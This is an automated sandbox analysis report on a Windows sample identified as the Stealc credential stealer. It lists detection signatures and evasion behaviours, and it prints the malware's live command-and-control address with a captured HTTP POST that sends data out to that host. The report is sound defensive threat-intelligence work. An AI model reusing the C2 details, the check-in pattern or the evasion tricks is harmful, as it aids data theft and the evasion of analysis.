Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532868
MD5:2e51f94d1dc93d7faaf5da2708fed2de
SHA1:3e9f21e5c0154ea1eb6ad2829ec86bfdd8ef178c
SHA256:cc6b3fcb986b487a1e9fdb5d0a0fc23ff1ea90cbc55733439c83898eb189773f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2E51F94D1DC93D7FAAF5DA2708FED2DE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6756JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6756JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.2e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T03:58:03.786676+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.2e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/xVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.php=Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phprVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/DVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/vVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpeVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpUVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpSVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpXVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 53%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_002EC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_002E7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_002E9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_002E9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_002F8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002F38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002F4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_002EDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_002EE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_002EED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_002F4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002EDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_002EBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_002F3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002EF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002EF68A FindFirstFileA,0_2_002EF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002E16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 34 37 33 46 39 33 44 46 30 30 33 32 38 33 38 39 36 32 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="hwid"E1473F93DF003283896264------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build"doma------GIEHJDHCBAEHJJJKKFID--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_002E4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 31 34 37 33 46 39 33 44 46 30 30 33 32 38 33 38 39 36 32 36 34 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="hwid"E1473F93DF003283896264------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build"doma------GIEHJDHCBAEHJJJKKFID--
                Source: file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/D
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpX
                Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpe
                Source: file.exe, 00000000.00000002.2102958941.0000000001366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
                Source: file.exe, 00000000.00000002.2102958941.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/v
                Source: file.exe, 00000000.00000002.2102958941.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/x

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006788150_2_00678815
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B90A20_2_005B90A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006059040_2_00605904
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B71E40_2_006B71E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AD1FA0_2_006AD1FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BC23D0_2_006BC23D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B3B7C0_2_006B3B7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9BF10_2_006A9BF1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00551BF50_2_00551BF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B8C420_2_006B8C42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006614240_2_00661424
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AEC3B0_2_006AEC3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063C40F0_2_0063C40F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058BD770_2_0058BD77
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BDD3F0_2_006BDD3F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B9E040_2_005B9E04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00577E370_2_00577E37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B06E30_2_006B06E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064C6F00_2_0064C6F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B569E0_2_006B569E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005957570_2_00595757
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BA7EE0_2_006BA7EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D8F910_2_005D8F91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AB78E0_2_006AB78E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 002E45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: eyyunreg ZLIB complexity 0.9950084163877054
                Source: file.exe, 00000000.00000003.2061630664.0000000005130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_002F9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_002F3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\39S1QBU3.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeVirustotal: Detection: 53%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1838592 > 1048576
                Source: file.exeStatic PE information: Raw size of eyyunreg is bigger than: 0x100000 < 0x19ac00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eyyunreg:EW;cayhnmlo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eyyunreg:EW;cayhnmlo:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002F9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c11d0 should be: 0x1caa7f
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: eyyunreg
                Source: file.exeStatic PE information: section name: cayhnmlo
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002FB035 push ecx; ret 0_2_002FB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079604E push ebx; mov dword ptr [esp], esi0_2_00796095
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079604E push edx; mov dword ptr [esp], 7346EE00h0_2_007960B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00745049 push edi; mov dword ptr [esp], 456197C7h0_2_00745077
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00678815 push edx; mov dword ptr [esp], edi0_2_00678918
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00678815 push 3BA925FBh; mov dword ptr [esp], ecx0_2_0067895A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007698E6 push 3A2EB958h; mov dword ptr [esp], ecx0_2_0076994E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007698E6 push 57A71021h; mov dword ptr [esp], edx0_2_0076997F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007698E6 push ecx; mov dword ptr [esp], esi0_2_007699A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007790DD push edi; mov dword ptr [esp], eax0_2_00779146
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076A0C2 push edx; mov dword ptr [esp], esp0_2_0076A90A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007548CA push ebp; mov dword ptr [esp], ecx0_2_007548EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B90A2 push 2D5091F5h; mov dword ptr [esp], esi0_2_005B910F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B90A2 push 6959114Ah; mov dword ptr [esp], edx0_2_005B9117
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B90A2 push ebx; mov dword ptr [esp], 5E15BE84h0_2_005B91B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B90A2 push ebx; mov dword ptr [esp], edx0_2_005B91D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E517D push ecx; mov dword ptr [esp], eax0_2_006E51A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E517D push 0AAB8B1Ch; mov dword ptr [esp], ecx0_2_006E522B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071696F push ebp; mov dword ptr [esp], edx0_2_007169B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054597E push ebp; mov dword ptr [esp], ebx0_2_00545AA3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00780923 push ecx; mov dword ptr [esp], eax0_2_00780B1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00780923 push 5185675Ah; mov dword ptr [esp], ecx0_2_00780C35
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00605904 push esi; mov dword ptr [esp], eax0_2_00605917
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00605904 push eax; mov dword ptr [esp], edi0_2_00605960
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00605904 push ebp; mov dword ptr [esp], ecx0_2_00605B19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00605904 push 6D91F3ABh; mov dword ptr [esp], ebx0_2_00605B2B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00605904 push eax; mov dword ptr [esp], ebx0_2_00605B37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00605904 push 12AEFA80h; mov dword ptr [esp], ebp0_2_00605B65
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A1114 push 77707621h; mov dword ptr [esp], ebx0_2_007A1165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B71E4 push ebx; mov dword ptr [esp], ecx0_2_006B7255
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B71E4 push 0C5E3BC5h; mov dword ptr [esp], edx0_2_006B730B
                Source: file.exeStatic PE information: section name: eyyunreg entropy: 7.954155944105544

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_002F9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13706
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54239B second address: 5423A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2D26 second address: 6C2D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA430E679F2h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA430E679F8h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
